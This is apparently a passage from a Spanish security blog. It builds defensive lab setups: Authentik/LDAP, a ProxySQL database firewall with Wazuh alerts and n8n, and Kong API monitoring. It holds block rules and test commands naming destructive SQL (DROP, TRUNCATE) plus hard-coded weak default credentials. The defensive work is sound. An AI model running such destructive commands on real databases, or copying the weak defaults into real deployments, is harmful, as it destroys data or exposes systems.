  server:
    image: ghcr.io/goauthentik/server:2024.8.3
    container_name: authentik-server
    restart: unless-stopped
    command: server
    environment:
      AUTHENTIK_REDIS__HOST: redis
      AUTHENTIK_POSTGRESQL__HOST: postgresql
      AUTHENTIK_POSTGRESQL__USER: ${PG_USER:-authentik}
      AUTHENTIK_POSTGRESQL__NAME: ${PG_DB:-authentik}
      AUTHENTIK_POSTGRESQL__PASSWORD: ${PG_PASS:-admin123}
      AUTHENTIK_SECRET_KEY: ${AUTHENTIK_SECRET_KEY:-changeme-please-generate-a-secret-key}
      AUTHENTIK_ERROR_REPORTING__ENABLED: "false"
      # Para integración con LDAP
      AUTHENTIK_LDAP__HOST: openldap
      AUTHENTIK_LDAP__PORT: 389
    volumes:
      - ./authentik/media:/media
      - ./authentik/custom-templates:/templates
    ports:
      - "9000:9000"
      - "9443:9443"
    depends_on:
      - postgresql
      - redis
      - openldap
    networks:
      - ldap_network

  # Authentik Worker
  worker:
    image: ghcr.io/goauthentik/server:2024.8.3
    container_name: authentik-worker
    restart: unless-stopped
    command: worker
    environment:
      AUTHENTIK_REDIS__HOST: redis
      AUTHENTIK_POSTGRESQL__HOST: postgresql
      AUTHENTIK_POSTGRESQL__USER: ${PG_USER:-authentik}
      AUTHENTIK_POSTGRESQL__NAME: ${PG_DB:-authentik}
      AUTHENTIK_POSTGRESQL__PASSWORD: ${PG_PASS:-admin123}
      AUTHENTIK_SECRET_KEY: ${AUTHENTIK_SECRET_KEY:-changeme-please-generate-a-secret-key}
      AUTHENTIK_ERROR_REPORTING__ENABLED: "false"
    user: root
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - ./authentik/media:/media
      - ./authentik/certs:/certs
      - ./authentik/custom-templates:/templates
    depends_on:
      - postgresql
      - redis
      - openldap
    networks:
      - ldap_network

  # OpenLDAP
  openldap:
    image: osixia/openldap:latest
    container_name: openldap
    environment:
      LDAP_BASE_DN: "dc=ironbox,dc=local"
      LDAP_ORGANISATION: "Ironbox"
      LDAP_DOMAIN: "ironbox.local"
      LDAP_ADMIN_PASSWORD: "admin"
      LDAP_TLS: "false"
    volumes:
      - ./ldap/bootstrap.ldif:/container/service/slapd/assets/config/bootstrap/ldif/custom/50-bootstrap.ldif
      - ldap-data:/var/lib/ldap
      - ldap-config:/etc/ldap/slapd.d
    networks:
      - ldap_network
    ports:
      - "389:389"
    command: --copy-service
    restart: unless-stopped

# phpLDAPadmin
  phpldapadmin:
    image: osixia/phpldapadmin:latest
    container_name: phpldapadmin
    environment:
      PHPLDAPADMIN_LDAP_HOSTS: openldap
      PHPLDAPADMIN_HTTPS: "false"
    networks:
      - ldap_network
    ports:
      - "8081:80"
    restart: unless-stopped
    depends_on:
      - openldap

  # N8N - Workflow Automation
  n8n:
    image: n8nio/n8n:latest
    container_name: n8n
    restart: unless-stopped
    ports:
      - "5678:5678"
    environment:
      - N8N_BASIC_AUTH_ACTIVE=true
      - N8N_BASIC_AUTH_USER=admin
      - N8N_BASIC_AUTH_PASSWORD=admin123
      - N8N_HOST=localhost
      - N8N_PORT=5678
      - N8N_PROTOCOL=http
      - WEBHOOK_URL=http://localhost:5678/
      - GENERIC_TIMEZONE=America/Argentina/Buenos_Aires
    volumes:
      - n8n-data:/home/node/.n8n
    networks:
      - ldap_network

  # HashiCorp Vault
  vault:
    image: hashicorp/vault:latest
    container_name: vault
    restart: unless-stopped
    ports:
      - "8200:8200"
    environment:
      VAULT_DEV_ROOT_TOKEN_ID: "root"
      VAULT_DEV_LISTEN_ADDRESS: "0.0.0.0:8200"
      VAULT_ADDR: "http://0.0.0.0:8200"
    cap_add:
      - IPC_LOCK
    networks:
      - ldap_network
    command: server -dev
  # MySQL de prueba
  mysql-test:
    image: mysql:8.0
    container_name: mysql-test
    environment:
      MYSQL_ROOT_PASSWORD: rootpass123
      MYSQL_DATABASE: testdb
      MYSQL_USER: testuser
      MYSQL_PASSWORD: testpass123
    ports:
      - "3306:3306"
    networks:
      - ldap_network
    volumes:
      - mysql_data:/var/lib/mysql
volumes:
  postgres-data:
    driver: local
  redis-data:
    driver: local
  ldap-data:
    driver: local
  ldap-config:
    driver: local
  n8n-data:
    driver: local
  mysql_data:
    driver: local

¡Espero que les sirva! Les dejo el repositorio y un pequeño video para que vean lo que hemos creado.

Saludos.

https://www.youtube.com/watch?v=lGBp7TG7FVk

Referencias

https://helgeklein-com.translate.goog/blog/authentik-authentication-sso-user-management-password-reset-for-home-networks/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=es&_x_tr_pto=tc

Cuando el SQL se pone peligroso: automatizando defensa con ProxySQL y Wazuh

Santiago Fernandez — Tue, 21 Oct 2025 23:04:13 GMT

Introducción

En el blog hemos implementado de todo, pero nunca un Monitoreo de Actividad de Base de Datos o un Firewall de Base de Datos, que utilizaremos para vigilar y registrar cada acción realizada en un sistema de bases de datos. Esto garantiza el acceso correcto a los datos, detecta actividades no autorizadas o sospechosas, y protege la información confidencial.

Imaginemos un escenario donde hemos sido vulnerados o, en su defecto, un empleado descontento que quiere ejecutar un DROP. Vamos a implementar ProxySQL para que esté en el medio entre el cliente y la base de datos y generar reglas para permitir o no comandos.

Arquitectura

ProxySQL

Es un proxy inteligente para bases de datos MySQL/MariaDB.

En pocas líneas 👇

Se ubica entre la aplicación y el servidor MySQL.
Permite filtrar, enrutar y balancear queries (por ejemplo, leer en réplicas y escribir en el master).
Puede bloquear o reescribir consultas peligrosas (DROP, TRUNCATE, etc.).
Mejora el rendimiento con cacheo de queries y pool de conexiones.
Facilita la observabilidad y control de tráfico SQL sin modificar la app.

👉 ProxySQL no puede modificar los datos devueltos por MySQL (como hashearlos u ofuscarlos), porque trabaja a nivel de capa de conexión y enrutamiento, no de contenido.
Su función principal es decidir a dónde va una query, si se permite o no, o si se reescribe antes de ejecutarse — pero no procesa ni altera los resultados que vienen del servidor. Ahi tenemos que aplicar Hasheo u ofuscación en el propio MySQL o consumir a traves de API que realice ese trabajo.

Vamos a lo nuestro. Todo estará en el repositorio, pero echemos un vistazo a config/proxysql/proxysql.cnf.

# config/proxysql/proxysql.cnf
datadir="/var/lib/proxysql"

admin_variables=
{
    admin_credentials="admin:admin"
    mysql_ifaces="0.0.0.0:6032"
    refresh_interval=2000
}

mysql_variables=
{
    threads=4
    max_connections=2048
    default_query_delay=0
    default_query_timeout=36000000
    have_compress=true
    poll_timeout=2000
    interfaces="0.0.0.0:6033"
    default_schema="information_schema"
    stacksize=1048576
    server_version="8.0.0"
    connect_timeout_server=3000
    monitor_username="monitor"
    monitor_password="monitor"
    monitor_history=600000
    monitor_connect_interval=60000
    monitor_ping_interval=10000
    monitor_read_only_interval=1500
    monitor_read_only_timeout=500
    ping_interval_server_msec=120000
    ping_timeout_server=500
    commands_stats=true
    sessions_sort=true
    connect_retries_on_failure=10

    # LOGGING
    eventslog_filename="/var/log/proxysql/queries.log"
    eventslog_default_log=1
    eventslog_format=2
}

# Backend MySQL servers
mysql_servers =
(
    {
        address="mysql-db"
        port=3306
        hostgroup=0
        max_connections=200
    }
)

# Users
mysql_users =
(
    {
        username = "app_user"
        password = "app_password"
        default_hostgroup = 0
        max_connections = 200
        active = 1
    }
)

# Query Rules - AQU BLOQUEAMOS COMANDOS PELIGROSOS
mysql_query_rules =
(
    # BLOQUEAR DROP
    {
        rule_id=1
        active=1
        match_pattern="(?i)^\\s*DROP\\s+(TABLE|DATABASE|SCHEMA)"
        error_msg="ERROR: DROP statements estan bloqueados por politica de seguridad"
        log=1
        apply=1
    },
    # BLOQUEAR TRUNCATE
    {
        rule_id=2
        active=1
        match_pattern="(?i)^\\s*TRUNCATE\\s+TABLE"
        error_msg="ERROR: TRUNCATE TABLE esta bloqueado por politica de seguridad"
        log=1
        apply=1
    },
    # BLOQUEAR DELETE SIN WHERE
    {
        rule_id=3
        active=1
        match_pattern="(?i)^\\s*DELETE\\s+FROM\\s+[a-zA-Z0-9_]+\\s*;?\\s*$"
        error_msg="ERROR: DELETE sin WHERE no esta permitido"
        log=1
        apply=1
    },
    # BLOQUEAR UPDATE SIN WHERE
    {
        rule_id=4
        active=1
        match_pattern="(?i)^\\s*UPDATE\\s+[a-zA-Z0-9_]+\\s+SET\\s+(?!.*WHERE).*$"
        error_msg="ERROR: UPDATE sin WHERE no esta permitido"
        log=1
        apply=1
    },
    # BLOQUEAR ALTER TABLE
    {
        rule_id=5
        active=1
        match_pattern="(?i)^\\s*ALTER\\s+TABLE"
        error_msg="ERROR: ALTER TABLE esta bloqueado - contacte al DBA"
        log=1
        apply=1
    },
    # BLOQUEAR GRANT/REVOKE
    {
        rule_id=6
        active=1
        match_pattern="(?i)^\\s*(GRANT|REVOKE)"
        error_msg="ERROR: Cambios de permisos no permitidos"
        log=1
        apply=1
    },
    # PERMITIR TODO LO DEMAS
    {
        rule_id=100
        active=1
        match_pattern=".*"
        destination_hostgroup=0
        log=1
        apply=1
    }
)

Ahora las reglas de Wazuh en config/wazuh_cluster/proxysql-rules.xml


<group name="proxysql,database,firewall,">

  
  <rule id="100500" level="0">
    <field name="event">COM_QUERYfield>
    <description>ProxySQL query eventdescription>
  rule>

  
  <rule id="100501" level="8">
    <if_sid>100500if_sid>
    <field name="hostgroup_id">-1field>
    <description>ProxySQL: Query bloqueada por firewalldescription>
    <group>database_security,firewall_block,group>
  rule>

  
  <rule id="100502" level="12">
    <if_sid>100501if_sid>
    <match>DROP TABLEmatch>
    <description>ProxySQL: DROP TABLE bloqueadodescription>
    <group>database_attack,pci_dss_10.2.5,group>
    <mitre>
      <id>T1485id>
    mitre>
  rule>

  
  <rule id="100503" level="12">
    <if_sid>100501if_sid>
    <match>TRUNCATE TABLEmatch>
    <description>ProxySQL: TRUNCATE TABLE bloqueadodescription>
    <group>database_attack,data_loss,group>
  rule>

  
  <rule id="100504" level="10">
    <if_sid>100501if_sid>
    <match>DELETE FROMmatch>
    <description>ProxySQL: DELETE bloqueadodescription>
    <group>database_security,group>
  rule>

  
  <rule id="100505" level="10">
    <if_sid>100501if_sid>
    <match>UPDATEmatch>
    <description>ProxySQL: UPDATE bloqueadodescription>
    <group>database_security,group>
  rule>

  
  <rule id="100506" level="10">
    <if_sid>100501if_sid>
    <match>ALTER TABLEmatch>
    <description>ProxySQL: ALTER TABLE bloqueadodescription>
    <group>database_security,ddl,group>
  rule>

  
  <rule id="100510" level="2">
    <if_sid>100500if_sid>
    <field name="hostgroup_id">0field>
    <description>ProxySQL: Query ejecutada exitosamentedescription>
    <group>database_access,group>
  rule>

  
  <rule id="100511" level="2">
    <if_sid>100510if_sid>
    <match>SELECTmatch>
    <description>ProxySQL: SELECT ejecutadodescription>
    <group>database_access,query,group>
  rule>

  
  <rule id="100512" level="4">
    <if_sid>100510if_sid>
    <match>INSERTmatch>
    <description>ProxySQL: INSERT ejecutadodescription>
    <group>database_access,data_modification,group>
  rule>

  
  <rule id="100520" level="14" frequency="5" timeframe="120">
    <if_matched_sid>100502if_matched_sid>
    <description>ProxySQL: Múltiples comandos DROP bloqueadosdescription>
    <group>database_attack,attacks,group>
  rule>

group>

Este es mi tree de directorio, con todo lo necesario.

Si tenes dudas de correr Wazuh en Docker, podes revisar post anterior o en referencias.

Dejo el proyecto completo en este repositorio.

He añadido N8N para gestionar esa alerta. Las opciones son infinitas; en mi caso, enviaré un correo, pero también podríamos bloquear, notificar por Slack y, por qué no, crear un caso en The Hive.

En ossec.conf añadí esto, justo debajo de donde le indico cómo leer los logs de ProxySQL:

  
  
  
  
  
    json
    /var/log/proxysql/queries.log
  

  
  
  
  
    custom-n8n
    http://n8n:5678/webhook/wazuh-proxysql
    8
    100502,100503,100504,100505,100506,100507,100508
    json

Prueba

Vamos a ejecutar un comando malicioso para ver cómo reacciona.

Aca la alarma, en Wazuh.

Vemos que corrió la integración.

Con esta evidencia, el Workflow comenzó a correr. Mientras tanto en Wazuh podemos ver la alarma.

Workflow N8N

Este es sencillo, pero hay miles de opciones! Te recuerdo que en el repositorio tenes la carpeta workflow donde esta el ndjson para importar a tu ambiente.

Aca el email, que genere.

Excelente señores ya podemos darle acceso al administrador, a través del proxy, para nuestra seguridad.

Espero que les sirva.

Comandos Utiles

# Ver archives
docker exec single-node-wazuh.manager-1 tail -50 /var/ossec/logs/archives/archives.log | tail -10

# Ver alerts (ahora deberían aparecer!)
docker exec single-node-wazuh.manager-1 tail -100 /var/ossec/logs/alerts/alerts.log | grep -i proxysql

# Ver en formato JSON
docker exec single-node-wazuh.manager-1 tail -50 /var/ossec/logs/alerts/alerts.json | grep -i proxysql

# Ver si hay errores de decoder
docker logs single-node-wazuh.manager-1 2>&1 | grep -i "mysql-decoder\|decoder.*mysql"

# Comando Truncate Bloqueado
docker run --rm --network single-node_poc-network mysql:8.0 \
  mysql -h proxysql -P 6033 -u app_user -papp_password produccion \
  -e "TRUNCATE TABLE auditoria;" 2>&1

# Comando Select Habilitado
docker run --rm --network single-node_poc-network mysql:8.0 \
  mysql -h proxysql -P 6033 -u app_user -papp_password produccion \
  -e "SELECT * FROM usuarios LIMIT 3;" 2>/dev/null

Protegiendo nuestras API's de manera inteligente.

Santiago Fernandez — Fri, 10 Oct 2025 15:39:51 GMT

Introducción

Generé una API Dummy de cuentas bancarias y para protegerla vamos a tener API Manager Kong al frente, reportando los log’s de las consultas que recibe a Wazuh. Si tenemos coincidencia con algunas de las reglas que cargaremos en Wazuh, se responderá al evento. Esa respuesta será dada por N8N, ejecutando un flujo de trabajo donde realizaremos diferentes pasos, como agregar la dirección del atacante en una lista negra de Kong o enviar un mensaje o, por qué no, levantar el caso en The Hive. Como si fuera poco agregamos Konga para la gestión grafica de Kong.

Arquitectura

Antes de eso deberían descargar la configuración de Wazuh Docker, para esta ocasión uso single-node-stack.

git clone https://github.com/wazuh/wazuh-docker.git -b v4.13.1

Generamos los certificados.

cd wazuh-docker/single-node/
docker compose -f generate-indexer-certs.yml run --rm generator

Una vez que lo corramos, podemos modificar le docker-compose original, con todo el stack necesario para esta prueba de concepto.

# Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)
services:
  wazuh.manager:
    image: wazuh/wazuh-manager:4.13.1
    hostname: wazuh.manager
    restart: always
    ulimits:
      memlock:
        soft: -1
        hard: -1
      nofile:
        soft: 655360
        hard: 655360
    ports:
      - "1514:1514"
      - "1515:1515"
      - "514:514/udp"
      - "55000:55000"
    environment:
      - INDEXER_URL=https://wazuh.indexer:9200
      - INDEXER_USERNAME=admin
      - INDEXER_PASSWORD=SecretPassword
      - FILEBEAT_SSL_VERIFICATION_MODE=none
      - SSL_CERTIFICATE_AUTHORITIES=/etc/ssl/root-ca.pem
      - SSL_CERTIFICATE=/etc/ssl/filebeat.pem
      - SSL_KEY=/etc/ssl/filebeat.key
      - API_USERNAME=wazuh-wui
      - API_PASSWORD=MyS3cr37P450r.*-
    volumes:
      - wazuh_api_configuration:/var/ossec/api/configuration
      - wazuh_etc:/var/ossec/etc
      - wazuh_logs:/var/ossec/logs
      - wazuh_queue:/var/ossec/queue
      - wazuh_var_multigroups:/var/ossec/var/multigroups
      - wazuh_integrations:/var/ossec/integrations
      - wazuh_active_response:/var/ossec/active-response/bin
      - wazuh_agentless:/var/ossec/agentless
      - wazuh_wodles:/var/ossec/wodles
      - filebeat_etc:/etc/filebeat
      - filebeat_var:/var/lib/filebeat
      - ./config/wazuh_indexer_ssl_certs/root-ca-manager.pem:/etc/ssl/root-ca.pem
      - ./config/wazuh_indexer_ssl_certs/wazuh.manager.pem:/etc/ssl/filebeat.pem
      - ./config/wazuh_indexer_ssl_certs/wazuh.manager-key.pem:/etc/ssl/filebeat.key
      - ./config/wazuh_cluster/wazuh_manager.conf:/wazuh-config-mount/etc/ossec.conf
      - ./config/wazuh_cluster/kong-rules.xml:/var/ossec/etc/rules/kong-rules.xml:ro
      - ./config/wazuh_cluster/0374-kong-decoder.xml:/var/ossec/etc/decoders/0374-kong-decoder.xml:ro # Agrego el decoder para Kong.
      - ./config/wazuh_cluster/custom-n8n:/var/ossec/integrations/custom-n8n:ro

    networks:
      - poc-network
  wazuh.indexer:
    image: wazuh/wazuh-indexer:4.13.1
    hostname: wazuh.indexer
    restart: always
    ports:
      - "9200:9200"
    environment:
      - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
    ulimits:
      memlock:
        soft: -1
        hard: -1
      nofile:
        soft: 65536
        hard: 65536
    volumes:
      - wazuh-indexer-data:/var/lib/wazuh-indexer
      - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem
      - ./config/wazuh_indexer_ssl_certs/wazuh.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh.indexer.key
      - ./config/wazuh_indexer_ssl_certs/wazuh.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh.indexer.pem
      - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem
      - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem
      - ./config/wazuh_indexer/wazuh.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml
      - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml
    networks:
      - poc-network
  wazuh.dashboard:
    image: wazuh/wazuh-dashboard:4.13.1
    hostname: wazuh.dashboard
    restart: always
    ports:
      - 443:5601
    environment:
      - INDEXER_USERNAME=admin
      - INDEXER_PASSWORD=SecretPassword
      - WAZUH_API_URL=https://wazuh.manager
      - DASHBOARD_USERNAME=kibanaserver
      - DASHBOARD_PASSWORD=kibanaserver
      - API_USERNAME=wazuh-wui
      - API_PASSWORD=MyS3cr37P450r.*-
    volumes:
      - ./config/wazuh_indexer_ssl_certs/wazuh.dashboard.pem:/usr/share/wazuh-dashboard/certs/wazuh-dashboard.pem
      - ./config/wazuh_indexer_ssl_certs/wazuh.dashboard-key.pem:/usr/share/wazuh-dashboard/certs/wazuh-dashboard-key.pem
      - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-dashboard/certs/root-ca.pem
      - ./config/wazuh_dashboard/opensearch_dashboards.yml:/usr/share/wazuh-dashboard/config/opensearch_dashboards.yml
      - ./config/wazuh_dashboard/wazuh.yml:/usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml
      - wazuh-dashboard-config:/usr/share/wazuh-dashboard/data/wazuh/config
      - wazuh-dashboard-custom:/usr/share/wazuh-dashboard/plugins/wazuh/public/assets/custom
    depends_on:
      - wazuh.indexer
    links:
      - wazuh.indexer:wazuh.indexer
      - wazuh.manager:wazuh.manager
    networks:
      - poc-network

# ============================================
# KONG DATABASE
# ============================================
  kong-database:
    image: postgres:15-alpine
    container_name: kong-database
    restart: always
    networks:
      - poc-network
    environment:
      POSTGRES_USER: kong
      POSTGRES_DB: kong
      POSTGRES_PASSWORD: kongpass
    ports:
      - "5432:5432"
    volumes:
      - kong-database-data:/var/lib/postgresql/data
    healthcheck:
      test: ["CMD", "pg_isready", "-U", "kong"]
      interval: 10s
      timeout: 5s
      retries: 5

# ============================================
# KONG MIGRATIONS
# ============================================
  kong-migrations:
    image: kong:3.5
    container_name: kong-migrations
    command: kong migrations bootstrap
    networks:
      - poc-network
    environment:
      KONG_DATABASE: postgres
      KONG_PG_HOST: kong-database
      KONG_PG_USER: kong
      KONG_PG_PASSWORD: kongpass
      KONG_PG_DATABASE: kong
    depends_on:
      kong-database:
        condition: service_healthy
    restart: on-failure

# ============================================
# KONG API GATEWAY
# ============================================
  kong:
      image: kong:3.5
      container_name: kong
      restart: unless-stopped
      networks:
        - poc-network
      environment:
        KONG_DATABASE: postgres
        KONG_PG_HOST: kong-database
        KONG_PG_USER: kong
        KONG_PG_PASSWORD: kongpass
        KONG_PG_DATABASE: kong
        KONG_PROXY_ACCESS_LOG: /dev/stdout
        KONG_ADMIN_ACCESS_LOG: /dev/stdout
        KONG_PROXY_ERROR_LOG: /dev/stderr
        KONG_ADMIN_ERROR_LOG: /dev/stderr
        KONG_ADMIN_LISTEN: 0.0.0.0:8001
        KONG_ADMIN_GUI_LISTEN: 0.0.0.0:8002
        KONG_PROXY_LISTEN: 0.0.0.0:8000, 0.0.0.0:8443 ssl
      ports:
        - "8000:8000"
        - "8443:8443"
        - "8001:8001"
        - "8002:8002"
      depends_on:
        kong-database:
          condition: service_healthy
        kong-migrations:
          condition: service_completed_successfully
      healthcheck:
        test: ["CMD", "kong", "health"]
        interval: 10s
        timeout: 10s
        retries: 10

# ============================================
# KONGA DATABASE
# ============================================
  konga-database:
    image: postgres:9.6-alpine
    container_name: konga-database
    restart: always
    networks:
      - poc-network
    environment:
      POSTGRES_USER: konga
      POSTGRES_DB: konga
      POSTGRES_PASSWORD: kongapass
    ports:
      - "5433:5432"
    volumes:
      - konga-database-data:/var/lib/postgresql/data
    healthcheck:
      test: ["CMD", "pg_isready", "-U", "konga"]
      interval: 10s
      timeout: 5s
      retries: 5

# ============================================
# KONGA PREPARE
# ============================================
  konga-prepare:
    image: pantsel/konga:latest
    container_name: konga-prepare
    command: "-c prepare -a postgres -u postgresql://konga:kongapass@konga-database:5432/konga"
    networks:
      - poc-network
    environment:
      DB_ADAPTER: postgres
      DB_HOST: konga-database
      DB_USER: konga
      DB_PASSWORD: kongapass
      DB_DATABASE: konga
    depends_on:
      konga-database:
        condition: service_healthy
    restart: on-failure

# ============================================
# KONGA GUI
# ============================================
  konga:
    image: pantsel/konga:latest
    container_name: konga
    restart: always
    networks:
      - poc-network
    environment:
      DB_ADAPTER: postgres
      DB_HOST: konga-database
      DB_PORT: 5432
      DB_USER: konga
      DB_PASSWORD: kongapass
      DB_DATABASE: konga
      NODE_ENV: production
      KONGA_HOOK_TIMEOUT: 120000
      DB_PG_SCHEMA: public
      TOKEN_SECRET: change-this-secret-token
    ports:
      - "1337:1337"
    depends_on:
      konga-database:
        condition: service_healthy
      konga-prepare:
        condition: service_completed_successfully
      kong:
        condition: service_healthy

# ============================================
# BANKING API
# ============================================
  banking-api:
    image: safernandez666/banking-api
    container_name: banking-api
    restart: always
    networks:
      - poc-network
    ports:
      - "3000:3000"
    volumes:
      - banking-data:/app

# ============================================
# LOGSPOUT - LOG FORWARDER
# ============================================
  logspout:
    image: gliderlabs/logspout:latest
    container_name: logspout
    restart: always
    networks:
      - poc-network
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
    command: syslog://wazuh.manager:514
    environment:
      - SYSLOG_FORMAT=rfc3164
      - LOGSPOUT=ignore
      - FILTER_NAME=kong|banking-api  # ← AGREGAR: Solo Kong y Banking API
    depends_on:
      - wazuh.manager
# ============================================
# N8N
# ============================================
  n8n:
    image: n8nio/n8n:latest
    container_name: n8n
    restart: unless-stopped
    ports:
      - "5678:5678"
    environment:
      - N8N_BASIC_AUTH_ACTIVE=true
      - N8N_BASIC_AUTH_USER=admin
      - N8N_BASIC_AUTH_PASSWORD=n8n_password
      - N8N_HOST=0.0.0.0
      - N8N_PORT=5678
      - N8N_PROTOCOL=http
      - WEBHOOK_URL=http://n8n:5678/
      - GENERIC_TIMEZONE=America/Argentina/Buenos_Aires
    volumes:
      - n8n_data:/home/node/.n8n
    networks:
      - poc-network
# ============================================
# OLLAMA
# ============================================
  ollama:
    image: ollama/ollama:latest
    container_name: ollama
    ports:
      - "11435:11434" # Expose Ollama's API port
    volumes:
      - ollama_data:/root/.ollama # Persistent storage for models and data
    restart: unless-stopped
    networks:
      - poc-network
# ============================================
# NETWORKS
# ============================================
networks:
  poc-network:
    driver: bridge

# ============================================
# VOLUMES
# ============================================
volumes:
  wazuh_api_configuration:
  wazuh_etc: 
  wazuh_logs:
  wazuh_queue:
  wazuh_var_multigroups:
  wazuh_integrations:
  wazuh_active_response:
  wazuh_agentless:
  wazuh_wodles:
  filebeat_etc:
  filebeat_var:
  wazuh-indexer-data:
  wazuh-dashboard-config:
  wazuh-dashboard-custom:
  kong-database-data:
  konga-database-data:
  banking-data:
  n8n_data:
  ollama_data:

Importante edistar ./config/wazuh_cluster/wazuh_manager.conf, para que lo tome Wazuh Manager como su ossec.conf. Le agregamos esto:

  
  
  
  <remote>
    <connection>syslogconnection>
    <port>514port>
    <protocol>udpprotocol>
    <allowed-ips>anyallowed-ips>
  remote>

  
  
  

  
  <integration>
    <name>custom-n8nname>
    <level>8level>
    <group>kong,attackgroup>
    <alert_format>jsonalert_format>
  integration>

También vamos agregar la integración custom-n8n en ./config/wazuh_cluster/.

#!/bin/bash
# Wazuh to n8n Integration

N8N_WEBHOOK_URL="http://n8n:5678/webhook/wazuh-kong-alerts"
LOG_FILE="/var/ossec/logs/integrations.log"

# Wazuh pasa el archivo de alerta como primer argumento
ALERT_FILE="$1"

# Timestamp
TIMESTAMP=$(date -u +"%Y-%m-%dT%H:%M:%SZ")

# Log
echo "[${TIMESTAMP}] Processing alert from file: ${ALERT_FILE}" >> ${LOG_FILE}

# Leer el contenido del archivo
if [ -f "${ALERT_FILE}" ]; then
    ALERT_JSON=$(cat "${ALERT_FILE}")

    # Enviar a n8n
    HTTP_CODE=$(curl -X POST "${N8N_WEBHOOK_URL}" \
      -H "Content-Type: application/json" \
      -d "${ALERT_JSON}" \
      -w "%{http_code}" \
      -s \
      -o /dev/null \
      --connect-timeout 10 \
      --max-time 30)

    if [ "${HTTP_CODE}" == "200" ] || [ "${HTTP_CODE}" == "201" ]; then
        echo "[${TIMESTAMP}] SUCCESS - HTTP ${HTTP_CODE}" >> ${LOG_FILE}
        exit 0
    else
        echo "[${TIMESTAMP}] FAILED - HTTP ${HTTP_CODE}" >> ${LOG_FILE}
        exit 1
    fi
else
    echo "[${TIMESTAMP}] ERROR - Alert file not found: ${ALERT_FILE}" >> ${LOG_FILE}
    exit 1
fi

Es muy importante que a custom-n8n le hagan un chmod 555, para que pueda ser ejecutado por cualquiera. Esto en local, antes de levantar el contenedor.

Agregamos el docoder y las regla, también en /config/wazuh_cluster. El decoder se llamara 0374-kong-decoder.xml y las regla kong-rules.xml.



<decoder name="kong-decoder">
    <prematch>^\S+ \S+ kong[\d+]:prematch>
    <regex>^\S+ \S+ kong[\d+]: (\S+) \S+ \S+ [\S+ \S+] "(\w+) (\S+) HTTP\S+" (\d+) \d+ \S+ \S+regex>
    <order>srcip, protocol, url, idorder>
decoder>



<group name="kong,">

  
  
  
  <rule id="100100" level="3">
    <decoded_as>kong-decoderdecoded_as>
    <description>Kong: API Gateway traffic detecteddescription>
    <group>kong,accessgroup>
  rule>

  
  
  

  
  <rule id="100101" level="5">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <id>^2\d\d$id>
    <description>Kong: Successful access to banking API - $(protocol) $(url) - Status: $(id) from $(srcip)description>
    <group>kong,banking,successgroup>
  rule>

  
  <rule id="100102" level="7">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <id>^4\d\d$id>
    <description>Kong: Client error on banking API - $(protocol) $(url) - Status: $(id) from $(srcip)description>
    <group>kong,banking,error,client_errorgroup>
  rule>

  
  <rule id="100103" level="10">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <id>^5\d\d$id>
    <description>Kong: Server error on banking API - $(protocol) $(url) - Status: $(id)description>
    <group>kong,banking,critical,server_errorgroup>
  rule>

  
  
  

  
  <rule id="100104" level="8" frequency="5" timeframe="60">
    <if_matched_sid>100102if_matched_sid>
    <same_source_ip />
    <description>Kong: Multiple failed requests ($(id)) from $(srcip) to banking API - Possible scanning or brute force attemptdescription>
    <group>kong,banking,attack,multiple_errors,scanninggroup>
  rule>

  
  <rule id="100105" level="9" frequency="3" timeframe="120">
    <if_matched_sid>100103if_matched_sid>
    <description>Kong: Multiple server errors on banking API - Service may be down or experiencing issuesdescription>
    <group>kong,banking,critical,service_degradationgroup>
  rule>

  
  
  

  
  <rule id="100106" level="6">
    <if_sid>100101if_sid>
    <url>/banking/cuentasurl>
    <description>Kong: Access to accounts endpoint - $(protocol) $(url) from $(srcip)description>
    <group>kong,banking,sensitive,accountsgroup>
  rule>

  
  <rule id="100107" level="6">
    <if_sid>100101if_sid>
    <url>/banking/transaccionesurl>
    <description>Kong: Access to transactions endpoint - $(protocol) $(url) from $(srcip)description>
    <group>kong,banking,sensitive,transactionsgroup>
  rule>

  
  <rule id="100108" level="7">
    <if_sid>100101if_sid>
    <url>/banking/transferenciasurl>
    <description>Kong: Access to money transfer endpoint - $(protocol) $(url) from $(srcip)description>
    <group>kong,banking,sensitive,transfers,high_riskgroup>
  rule>

  
  
  

  
  <rule id="100110" level="8">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <protocol>DELETEprotocol>
    <description>Kong: DELETE request on banking API - $(url) from $(srcip)description>
    <group>kong,banking,modification,delete,high_riskgroup>
  rule>

  
  <rule id="100111" level="6">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <protocol>PUT|PATCHprotocol>
    <description>Kong: Modification request on banking API - $(protocol) $(url) from $(srcip)description>
    <group>kong,banking,modificationgroup>
  rule>

  
  <rule id="100112" level="5">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <protocol>POSTprotocol>
    <id>^2\d\d$id>
    <description>Kong: POST request on banking API - $(url) from $(srcip)description>
    <group>kong,banking,creationgroup>
  rule>

  
  
  

  
  <rule id="100120" level="7">
    <if_sid>100100if_sid>
    <url>/banking/url>
    <id>^401$id>
    <description>Kong: Unauthorized access attempt to banking API - $(protocol) $(url) from $(srcip)description>
    <group>kong,banking,authentication,unauthorizedgroup>
  rule>

  
  <rule id="100121" level="9" frequency="3" timeframe="60">
    <if_matched_sid>100120if_matched_sid>
    <same_source_ip />
    <description>Kong: Multiple unauthorized access attempts from $(srcip) - Possible credential stuffing attackdescription>
    <group>kong,banking,attack,authentication,credential_stuffinggroup>
  rule>

  
